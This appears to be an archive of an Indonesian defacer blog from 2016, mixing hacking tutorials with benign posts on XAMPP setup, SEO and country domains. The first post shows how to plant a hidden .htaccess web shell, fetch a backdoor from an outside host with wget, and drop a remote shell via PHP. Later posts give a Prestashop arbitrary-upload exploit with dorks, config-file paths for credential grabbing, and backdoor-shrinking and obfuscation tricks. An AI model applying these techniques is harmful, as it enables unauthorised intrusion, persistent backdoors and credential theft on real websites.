Minggu, 21 Agustus 2016

Trik Menyisipkan Hidden Backdoor


Pada tutor ini seperti di judul, kita akan membahas cara menyisipkan backdoor ke suatu file,
Masalah terbesar para Defacer adalah ketika file backdoornya di hapus si mimin (admin) atau malah kena Redeface Defacer lain, karena bug (celah) belum di tutup. Pasti pernah kan kek gitu? udah pasti pernah kan? yakan, yakan :v

Ini adalah solusi untuk mengantisipasi kemungkinan diatas.
Method lama cuman gw share kembali, biar manfaat buat para generasi penerus bangsa :3
Oke langsung saja ke triknya,
Disini gw punya 2 cara :

CARA 1
1. Gw asumsikan lu udah punya target atau sudah nanem backdoor di dalem webnya,
2. Buat file baru dengan ekstensi .php/.htaccess, isi dengan script ini :
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
3. Di contoh ini, file gw kasih nama .htaccess
NOTE:
a. Upayakan file di atas tersimpan di directory yang sekiranya admin tidak akan curiga
b. Fungsi script diatas adalah allow shell command
4. Di langkah ini seharusnya lu udah kebayang kan bagaimana cara kerjanya :v

CARA KERJA SCRIPT :
A. Melihat Isi Sempak :3
1. Untuk menampilkan list directory di server linux, command gini: site/.htaccess?cmd=ls , Kalau make server windows tinggal ganti dengan: dir
2. Hasilnya list akan menyamping, belum nemu cara biar hasilnya bisa rapi kebawah :3
3. Screenshot

B. Menanam Bekdur :v
1. Kita manfaatkan fungsi wget, untuk mengambil script backdoor yang sudah ada di web lain
*Upload file backdoornya di hosting gratisan atau make pastebin jga bisa
2. Command gini: site/.htaccess?cmd=wget http:/www.websitemu.com/shell.php
*File extension terserah (.php , .txt , .jpg , dll) . Di contoh ini make .txt
3. Screenshot
4. Jika sudah di eksekusi, cek lagi dengan command: site/.htaccess?cmd=ls
5. Screenshot
6. Shell sudah masuk, haha :D Jika backdoor yang di wget tdi .php, lu bisa langsung eksekusi. Karena di contoh ini gw make .txt maka harus di rename dulu filenya biar bisa jalan backdoornya, di step berikutnya akan di bahas cara merenamenya (buat yang biasa make linux bisa skip :v , tutorial ini buat yang masih pemula)

C. Rename File
1. Caranya sangat simple,
2. Command gini: site/.htaccess?cmd=mv nama-file-awal  nama-yang-diinginkan
3. Screenshot
4. Jika masih penasaran file sudah berubah atau belum, bisa cek dengan: site/.htaccess?cmd=ls
5. Screenshot
6. Tinggal Eksekusi deh, haahahaha :v

F.A.Q
you: Jadi ini cuman mainan di address bar aja iya?
me: Ya, cocok buat yang make addons hackbar (yang injector pasti tau lah :v) lebih mudah :3

CARA 2
1. Seperti di CARA 1, lu harus di dalem website target dulu,
2. Script untuk memanggil shellnya :
$nama= fopen("backdoor.php" ,"w+");
$file = file_get_contents('http://www.websitemu.com/shell.php');
$tulis = fwrite ($nama ,$file);
fclose($nama);
NOTE:
a. backdoor.php = nama file yang akan dibuat nanti
b. http://www.websitemu.com/shell.php = shell dari website lain (bisa format .php ataupun .txt)

CARA PENGGUNAAN :
1. Sisipkan script di atas, ke file apapun (yang penting ingat namnya)  *Harus file berekstensi .php
2. Jika file yang disisipkan script barusan di akses, maka backdoor akan otomatis terbuat

F.A.Q
you: Masa sih bisa langsung terbuat?
me: Langsung di coba aja daripada penasaran :3

Semoga Bermanfaat ^.^

Sabtu, 20 Agustus 2016

Web Shell Detector


Pasti gak asing lagi di telinga. Nama "backdoor" udah seperti makanan sehari-hari buat para developer web, programmer web, dan yg biasa nongkrong di underground network :3
Nah pada tutorial kali ini, gw mau share script yang berguna banget buat developer dan programmer web atau yang lagi belajar web sekuriti eeiits, mksudnya security. Bukan satpam loh ya -_-
Script ini berfungsi untuk menscan file-file (yang di curigai sebagai suspicious/shell) termasuk file yang di dalam folder, sampai ke akar" nya.
Pasti penasaran dong gmna cara kerjanya script ini.

Script ini dibuat oleh orang asal Israel dengan codename Maxim,
Dibuat 2 tahun yang lalu,
Dia membuat project-project dan salah satunya Web Shell Detector ini,
Jika Ingin lihat projectnya bisa ke Github
Oke lanjut ke cara penggunaannya ya, begini :

1. Copas script dibawah, simpan dengan nama shelldetect.php


2. Copas script dibawah, simpan dengan nama shelldetect.db


3. Simpan dalam 1 folder
4. Jalankan dengan memanggil name file. Contoh site.com/shelldetect.php atau bisa juga dijalankan di server local / localhost

NOTE :
2 File di atas harus di simpan satu folder, lebih baik jika disimpan dan dijalankan di /public_html/

Screenshot :

JIKA TIDAK DITEMUKAN FILE MENCURIGAKAN

JIKA DITEMUKAN FILE YANG MENCURIGAKAN

Semoga Bermanfaat :D

Kamis, 18 Agustus 2016

Daftar Letak File Config CMS Website


Semua website pasti ada yg namanya file config,
Yang fungsinya untuk menghubungkan frontend website ke backend (database),
Nah, dari pada ilmuya w pke sndiri lbh baik kan di share ke orng bnyak kan biar manfaat :'v
Jika udh tau nih file confignya, dan kalo ja kebetulan targetmu make cms yg ada di daftar ini, bisa lngsung di sabun massal lwat shell hsh < biasanya nih kalo defacernya lgi galau, main sikaat aja, tanpa pikir panjang :3
Buat yg biasa ngoding nih, bisa jga ini bwat nambah fitur di shellnya, auto edit/grab apalah itu namanya :v
Dah gtu aja basa basinya, jika masih blum paham lu gugel aja, artikel udh bnyk bertebaran :3

Ini adalah daftar letak config yg selama ini gw tau, kali aja ada yg mau nambahin bisa taruh di komentar, ntar w update artikelny :D
cekidoot....

Cpanel
rootdir/.my.cnf

Hash WHM
rootdir/.accesshash

Laravel
rootdir/.env

BosWeb
/public_html/bw-configs/config.ini

Lokomedia
/public_html/lokomedia/config/koneksi.php
/public_html/config/koneksi.php

WHMCS
/public_html/whm/configuration.php
/public_html/whmcs/configuration.php
/public_html/clientarea/configuration.php

Drupal
/public_html/sites/default/settings.php

PrestaShop
/public_html/config/settings.inc.php

OpenCart
/public_html/admin/config.php

Ellislab
/public_html/application/config/database.php

MyBB
/public_html/inc/config.php

VBULLETIN
/public_html/include/config.php

phpBB
/public_html/config.php

Joomla
/public_html/configuration.php

WordPress
/public_html/wp-config.php

ipb
/public_html/conf_global.php

e107
/public_html/e107_config.php

Oscommerce
/public_html/includes/configure.php

php-fusion
/public_html/config.php

Smf
/public_html/Settings.php

php nuke
/public_html/html/config.php

Xoops
/public_html/mainfile.php

Zen Cart
/public_html/includes/configure.php

setidio
/public_html/datas/config.php

Magento
/public_html/app/etc/local.xml

Balitbang
/public_html/lib/config.php

Smoga bermanfaat :)

Sabtu, 13 Agustus 2016

Cara Menjalakan IIS7 dan XAMPP (Apache) di Windows


Setelah sekian lama nggak ngepost, mumpung ada wktu jdi dbikin tutorial ini, hehe
Buat para developer pasti pgen tau kan sensasi mnjalankan 2 web server dalam satu machine,
Untuk mmbantu jga yg mau belajar bikin project, riset riset, experimen :v
Nah pada tutorial ini gw mo share cara setting nya,
Pada intinya kita hanya butuh merubah portnya saja biar ngga' tabrakan bos,
Oke ya, lngsung ke tutor nya :

A. Setting Port Xampp
1. Lu hrus tau dlu direktori xampp nya :v . direktori default xampp ada di c:\xampp\
2. Sekarang masuk ke \xampp\apache\conf
3. Biar aman, backup dlu file "httpd.conf". Krn file ini yg kita konfigurasi
4. Rename terserah lu, klo gw jadi gini "httpd.conf.bak"
5. Buka file httpd.conf dgn text editor, make notepad / notepad++ terserah
6. Cari text :
a. Listen 80
(Defaultnya ada di line 47)
ganti menjadi Listen 8080
b. ServerName localhost:80
(Defaultnya ada di line 181)
ganti menjadi ServerName localhost:8080
7. Selanjutnya masuk ke \xampp\apache\conf\extra
8. Buka file httpd-ssl.conf (bisa di backup dlu, bwat jaga")
9. Cari text:
a. Listen 443
Ubah ke 449
b. <VirtualHost _default_:443>
Ubah ke <VirtualHost _default_:449>
c. ServerName www.example.com:443 / ServerName localhost:449
NOTE:  Knpa ada dua? Krn di versi xampp berbeda", ada dua kmungkinan, jadi coba satu".
Ubah ke ServerName www.example.com:449 / ServerName localhost:449
10. Setting selesai, silahkan di jalankan lgi xampp nya. Start dlu di XAMPP Control Panel nya, lalu akses ke http://127.0.0.1:8080/ atau http://localhost:8080/
11. Doc root ada di \xampp\htdocs

Belum Terinstall XAMPP ? Masuk sini stah

B. Setting Port IIS 7
1. Tidak perlu di setting portnya
2. IIS jga tidak perlu di Start dlu sperti halnya xampp, karena iis otomatis running saat windows jalan
3. Untuk aksesnya, lngsung ketik: localhost
4. Doc root ada di C:\inetpub\wwwroot

Belum Terinstall IIS 7 ? Masuk sini ster

Semoga bermanfaat ^.^

Sabtu, 25 Juni 2016

Auto Exploit Prestashop 1.6 Arbitrary File Upload


Memudahkan untuk yang males copas atu" dari link ke exploit csrf, bisa make cara ini :v
Untuk dork dan penjelasan lain bisa artikel sebelumnya kesini

Script original dari ustadcage48

Comot dimari :
disini

Semoga Bermanfaat :)

Trik Mempercepat Penghasilan Popcash.net


Buat yg ga' sabar nunggu earning popcash kok lama yaa? ya itu krna visitor di site/blogmu rendah :'v
tpi jgn nyerah, di tutor ini seperti di judul w akan share triknya dsini
lngsng ja ya ke step stepnya..

Syarat :
- Akun Popcash (Kalau blm, ikutin intruksi+cara cepat di approve disini)
- Email aktif tentunya
*Jika sudah punya syarat"ny bisa lngsng ikutin langkah" dibawah

Cara Mudah Mendapatkan Url Popcash :
- Khusus untuk pengguna Mozilla Firefox
- Masuk ke Option > Content > Pop-ups > Centang Block pop-up windows
- Buka site/blogmu yg sdh terpasang script dari Popcash
- Klik di sembarang sisi pada blog. Nanti akan muncul notif seperti gmbar di bwah ini, lalu Klik pada Options > Klik Show 'http://www.popcash.net/world/go/blablabla..'
- Ketika muncul popup window nya, langsung copas link nya sebelum ke redirect ke website iklan lain
- Jika yang lu copas benar, kurang lebih seperti ini
http://www.popcash.net/world/go/111XXX/240207/aHR0cCUzQSXXXXXXXXXXXXXXXX
- Jika tidak sama dengan contoh url diatas, brarti salah. Ulangin lagi langkah diatas. Dan jika sudah dapat url popcashnya bisa lanjut ke langkah dibawah

Next step..
Langkah - Langkah :
- Daftar disini
- Klik "Sign Up"
- Isi data seperti biasanya
- lalu konfirm email untuk aktivasi
- Jika sudah masuk ke menu "My Website>ADD NEW WEBSITE"
- Isi formnya dengan link popcashmu, jika sudah klik Submit, lebih jelasnya lihat gambar dibawah
- Sekarang masuk ke menu "Earn Traffic" > Lalu download software HitLeap Viewernya
- Install dan Buka software nya, login dengan akunmu.
- Jika sudah masuk akan seperti gmbar dibawah ini, lalu klik "START EARNING MINUTES"
- Dan biarkan softwarenya bekerja, Minimaze saja jika ingin membuka browser atau yg lain
- Tiap menit yang lu gunakan untuk surfing di situs ini, akan menambah All-Time Minutes Earned yang nantinya akan ditukar dengan kunjungan ke situs popcash tadi. Udah kebayang kan gmna cara kerja softwarenya :D

HASIL DALAM 2 HARI
Sebelum
 Sesudah
Semoga bermanfaat :)

Rabu, 22 Juni 2016

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

Exploit Author :
people_hurt

Dork :
- inurl:/modules/columnadverts/
- Kembangin lagi ya :D

Jika Vuln akan seperti ini :
Exploit & poc :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"

Exploit :
<form method="POST" action="TARGET/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Respon : success:shell.xxx
Auto Exploit:
DISINI

Shell Access :
TARGET/modules/modul name/slides/shell.xxx

Sabtu, 18 Juni 2016

PHP Inbox Mailer [Tinggal Make]


[MASIH ERROR, JGN DIPAKE DULU]
Pasti dah pada tau kan ini buat apa, stelah ngoding berhari" jadilah ni tools
ada 2 versi disini yang gk make smtp dan make smtp..
Smua tools ini free..
Apalah arti privat? hahaha ^.^

Link Tools :
- Dengan SMTP -> Disini
- Tanpa SMTP -> Disini

*Kalo ada error atau apa, bisa brkomentar :)

Semoga bermanfaat :D

PHP Script Encoder dengan Looping [EASY STEP]


Kali ini w mau share tool buat mengencrypt script php,
Udah tau lah ya fungsinya buat apa? Yaa fungsinya buat ngerubah script php yang biasa menjadi angka dan huruf random yang mungkin buat para pemula pasti kebingungan kalau mau nyolong script itu tdi ditambah dengan fitur looping jadi encodenya bisa d lakukan berulang" :D hehe..

dah gitu aja ya pnjelasan sngkatnya
Tool nya w bikin online. untuk yng pengen source codenya pm aja lwt fb :D

Cara Penggunaan :
- Masukin script phpmu tanpa <? php
- Result akan muncul dibawah, seperti contoh gmbar d bwah ini
Link Tool :
Disini

Semoga Bermanfaat :D

Senin, 06 Juni 2016

GRAYHAT SEO PAGE ONE GOOGLE

Hari ini gw akan share trik privat yang bisa menjadi cara alternatif buat lu yang pengen blog/sitenya jadi nomer satu di google search, perpaduan antara teknik blackhat seo dan whitehat seo. Cara ini gw namain GRAYHAT SEO PAGE ONE GOOGLE, sebut saja di tutorial ini kita membahas Cara merebut halaman pertama google...
NB: TRIK INI AMAN JIKA ANDA MENGIKUTI STEP-STEP DIBAWAH DENGAN BENAR DAN TIDAK BERLEBIHAN!

NAMA TUTORIAL : GRAYHAT SEO PAGE ONE GOOGLE
MADE BY : YUZA - 2016
Indonesia punya ini hahaha..

ALAT PERANG (WAJIB) :
- Email aktiv
- Seo Link Builder, download dimari
- Indexer, download disini

Okee, skarang lngsng ke tutorial nya,
udah w bagi ke beberapa kegiatan, untuk menghindari spam detection oleh google. Ikutin baik" step stepnya:

A. YANG HARUS LU LAKUIN SETIAP HARI
PERTAMA:
1. Rajin update artikel, tujuannya supaya pengunjung blog bisa melihat perkembngan dari tema blog yang lu usung/tema blogmu
2. Share/Promosiin artikel/blogmu ke social media, biasanya ada di grup"
3. Untuk meningkatkan Traffic, bisa menggunakan teknik BlogWalking yaitu cara dimana lu saling tukar site/blog ke seseorang (saling mengunjungi)

KEDUA:
1. Submit url blog/site mu menggunakan Seo Link Builder
2. Install link builder seperti biasa, klo blum punya baca lagi dari atas
3. Buka Seo Link Builder, Setting seperti gambar dibawah ini
4. Tunggu sampai proses selesai, nanti akan ditandai Linking Complete

B. YANG LU HARUS LAKUIN SEMINGGU SEKALI
PERTAMA:
1. Submit url/site mu ke 3.500 backlink
2. Masuk kesini
3. Isikan seperti biasa, jika kurang jelas lihat gambar dibawah ini

KEDUA:
1. Submit url/site mu ke Indexer, download toolsnya diatas
2. Install seperti biasanya, Isi sperti gambar dibawah ini
3. Jika selesai akan mncul Proses Complete!

C. YANG HARUS LU LAKUIN SEBULAN SEKALI
1. Submit url/site mu disini
2. Isi seperti gambar dibawah
3. Nanti bberapa submission akan failed. Bukan berarti error, tapi lu harus submit manual.
4. Berikut ini submit yang harus lu kunjungi:
- Google : disini
- Bing : disini
5. Beberapa akan dikirim ke emailmu..
6. Buka saja urlnya, dan Submit manual


HASILNYA
Copy Paste Mohon Sertakan Sumber Asli :)
Semoga Bermanfaat :)

Sabtu, 04 Juni 2016

Trik Memperkecil Size Shell Backdoor

Trik ini simple banget dan gw lihat belum banyak yang tau trik ini :)
So apa salahnya kalau gw share triknya dimari..
siapa sih yang kadang mau upload shell terus size kegedean ? pasti nunggunya agak lama kan, hehe
Kali ini kita memanfaatkan function file_get_contents pada php

Langkah Langkah :
1. Buat script seperti ini:

2. Ganti XXX dengan backdoor(file.php) yang terupload di web dengan format .txt . Lebih jelasnya lihat gambar dibawah :D
3. Jadi nanti seperti ini "...file_get_contents("sitemu.com/filemu.txt")..."
4. Dan lihat size backdoormu  sekarang, gak sampek 1kb :'v


Semoga Bermanfaat :)

Trik Mempercepat Loading Blog

Kali ini gw mau share trik cara mempercepat loading blog dengan Javascript Lazy Load, bisa langsung di cek lwat tool ini

Oke lngsung ke langkah-langkahnya ya :
1. Masuk ke Blogger
2. Template
3. Edit HTML
4. Tambahkan code di bawah sebelum </ body >

5. Save Template

Hasil Test Speed Blog :


Dah ya gitu ja ya :D
Semoga Bermanfaat :)

Kamis, 02 Juni 2016

Alasan Kenapa Website Pemerintah Mudah di Deface


Yaa seperti di judul. kali ini saya akan membahas kenapasih website pemerintah kita ini mudah di deface?
Mari kita pelajari sedikit demi sedikit, kemungkinan hal ini akan berkembang menjadi lebih lebar lagi.

Kita telaah dari sisi Defacer & Webmaster :

Defacer setiap hari selalu mencari celah keamanan website agar bisa di deface, melakukan penelitian terhadap sourcecode yang ada, melihat update vulnerability dari website-website security yang ada di jagad raya. Berdiskusi di forum untuk menemukan dan memecahkan sesuatu yang tidak bisa dipecahkan. Hal inilah yang biasanya hampir tidak pernah dilakukan oleh Webmaster & Administrator. Defacer, bisa saja terdiri dari banyak orang yang berbeda-beda dan berasal dari lokasi mana saja di dunia ini, misalkan: Indonesia, Turki, Brazil, India, Tunisia, dsb. Oleh sebab itu bisa kita golongkan bahwa defacer merupakan sebuah kumpulan orang banyak.

Administrator / Webmaster biasanya terdiri dari beberapa orang saja, bisa 1-3 orang saja. Administrator / Webmaster bertugas untuk mengatur dan mengurus website. Namun, entah kenapa kebanyakan webmaster & administrator website pemerintah Indonesia kebanyakan menggunakan layanan instant public (hosting, opensource cms, dsb), alangkah baiknya bila situs-situs pemerintah memiliki suatu badan tersendiri yang mengurusi hal ini (dalam bayangan).

Dari penjelasan di atas, terdapat beberapa kelebihan Defacer daripada Webmaster:

1. Defacer unggul dalam jumlah, karena defacer bisa siapa saja di dunia ini.
2. Defacer bergerak setiap hari mengikuti perkembangan security.
3. Defacer mencoba dan melakukan research terdahap kelemahan-kelemahan di website setiap saat.

Kita bisa melihat beberapa website pemerintah Indonesia yang di hack disini:
http://zone-h.org/archive/filter=1/domain=go.id/fulltext=1/page=1


Ada beberapa alasan mengapa website pemerintah mudah di deface:

1. Penggunaan CMS yang free dan opensource tanpa adanya modification. Sehingga keseluruhan konfigurasi menggunakan default konfigurasi, hal ini memudahkan para defacer untuk menemukan informasi file, directory, source, database, user, connection, dsb.
2. Tidak updatenya source atau tidak menggunakan versi terakhir dari CMS. Hal ini sangat rentan, karena security issue terus berkembang seiring masuknya laporan dan bugtrack terhadap source, kebanyakan hal inilah yang menjadi sebab website mudah dideface.
3. Tidak pernah ada research yang mendalam dan detail mengenai CMS sebelum digunakan & di implementasikan. Sehingga pemahaman dan pengetahuan dari webmaster hanya dari sisi administrasinya saja, tidak sampai ke level pemahaman sourcecode.
4. Tidak adanya audit trail atau log yang memberikan informasi lengkap mengenai penambahan, pengurangan, perubahan yang terjadi di website baik source, file, directory, dsb. Sehingga kesulitan untuk menemukan, memperbaiki dan menghapus backdoor yang sudah masuk di website.
5. Jarang melakukan pengecekan terhadap security update, jarang mengunjungi dan mengikuti perkembangan yang ada di situs-situs security jagad maya. Sehingga website sudah keduluan di deface oleh defacer sebelum dilakukan update dan patch oleh webmaster.
6. Kurangnya security awareness dari masing-masing personel webmaster & administrator. Sehingga kewaspadaan terhadap celah-celah keamanan cukup minim, kadangkala setelah website terinstall dibiarkan begitu saja. Kurangnya training dan kesadaran akan keamanan website seperti ini akan menjadikan website layaknya sebuah istana yang tak punya benteng.

Berikut screenshoot  Dari Zone-H.Org OpenSource CMS yang memiliki vulnerability


Vulnerability OpenSource CMS By Telematika.Co.Id

Vulnerability OpenSource CMS By Joomla.Org – Joomla 1.5

Untuk teman-teman Webmaster / Administrator website pemerintah, ada beberapa saran yang mungkin bermanfaat untuk dapat di implementasikan:


1. Wajib untuk mengikuti perkembangan source dari source website yang digunakan, backuplah website dan database sebelum dilakukan update.
2. Kebanyakan defacer telah memasang backdoor ketika telah berhasil melakukan deface website, hal ini dimungkinkan agar dapat melakukan deface ulang terhadap website. Wajib untuk memeriksa perubahan folder, file, database dan source terakhir dari website.
3. Pelajarilah lebih dalam mengenai dasar-dasar hacking dan antisipasinya (RFI, LFI, CSRF, SQL Injection, XSS, Exploit, Dsb) karena artikel ini sudah banyak bertebaran di Internet. Semakin banyak tahu & mengerti tentang sebuah kelemahan website dari dasar-dasar hacking, maka akan semakin banyak tahu pula bagaimana cara mengatasinya.
4. Sering-seringlah berdiskusi di forum dan milist yang berkaitan dengan perangkat serta aplikasi yang mensupport website anda, baik dari sisi operating system, tempat hosting, bugtrack milist, developer milist, dsb. Hal ini bertujuan agar informasi vulnerability dapat dipatch lebih cepat sebelum defacer beraksi.
5. Hardening website dan source wajib dilakukan, misalkan jangan menggunakan “default configuration”, aturlah sedemikian rupa “configuration website” dengan memperhatikan: permission, access level, indexing, database connection, database configuration, password dan user management.
6. Gunakanlah tambahan plugin / component yang tepat, sehingga dapat meminimalisasi terjadinya kegiatan defacing dari thirdparty. Pastikan hasil review & ranking plugin bereputasi baik dan sudah di verified oleh penyedia CMS yang bersangkutan.
7. Lakukanlah penetration testing terhadap website, baik secara lokal maupun langsung di website. Banyak tools penetration testing yang bisa digunakan: Nexus, Acunetix, dsb. Tapi yang paling bagus dan lebih cepat adalah, copy source dan database website, Install di local computer, kemudian lakukanlah penetration testing. Updatelah website bila ditemukan vulnerability.
8. Backdoor, baik (php, asp, perl, phyton) dikenali dengan baik oleh beberapa Antivirus, ada bisa cleaning dengan melakukan scanning terhadap source website secara local. Apabila tidak dikenali, terpaksa anda harus mencari secara manual.

Pada bagian ini, saya akan mencoba memberikan salah satu solusi apabila website sudah terlanjur dideface, silakan menggunakan langkah berikut:


1. Download source & database yang ada di website untuk backup. Hal ini untuk berjaga-jaga apabila langkah yang kita lakukan gagal, tetapi apabila konfigurasi & file benar dan lengkap dijamin 100% berhasil, terkecuali ada sesuatu yang terlewatkan.
2. Download source CMS versi terbaru dari website penyedia CMS, misalkan: www.drupal.org, www.joomla.org, www.wordpress.org, dsb.
3. Lakukanlah perbaikan database secara lokal, berjaga-jaga apabila backdoor ada di database. Biasanya didalam database ada access user tidak dikenal yang akses levelnya sama dengan Administrator.
4. Install CMS yang tadi sudah di download di web hosting. Kemudian lakukanlah konfigurasi: database, file permission, directory permission. Jangan menggunakan default configuration, modifikasilah konfigurasi-konfigurasi yang ada agar lebih powerfull.
5. Kemudian instalasi component: Themes, Plugin, Component, dsb. Gunakanlah yang paling update, atau source baru dari komponen yang akan di Install (Fresh Install Component).
6. Kemudian update database, dengan login ke Database Control Panel (phpMyAdmin, DB Admin, cPanel Database, dsb). Setelah anda melakukan login, maka importlah database.
7. Gantilah username Administrator & Password menggunakan nama yang lebih Unik, jangan menggunakan user (admin, administrator, adm1n, dsb) gunakanlah yang lebih powerful dan susah untuk di tebak untuk menghindari bruteforce, gunakanlah alias untuk menampilkan username administrator di web content.

Semoga sedikit sharing mengenai keamanan website ini berguna buat para sahabat-sahabat Webmaster & Administrator Website.

*Dikutip dari berbagai sumber
Semoga Bermanfaaat :)
Keep save & secure..

Rabu, 01 Juni 2016

Daftar Lengkap Domain Seluruh Dunia

 
Kali ini gw mo share daftar domain lengkap seluruh dunia
Berikut ini adalah daftar Top Level Negara-negara di Dunia yang dikeluarkan oleh Internet Assign Numbers Authority (IANA). IANA adalah salah satu badan independent yang mengatur masalah pengaturan Domain Internet. Saat ini (per tanggal 1 Januari 2002) terdaftar sebanyak 243 Negara yang terdaftar.

A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *

C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006, Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko

D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)

E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang “dikhususkan” oleh ISO 3166-1)

F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis

G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana

H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *

I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia

J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang

K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *

L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *

M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik

N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *

O
.om – Oman

P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay

Q
.qa – Qatar

R
.re РR̩union
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda

S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *

T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania

U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang “dikhususkan” oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan

V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *

W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *

Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)

(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)

Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe

Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org

Bersponsor
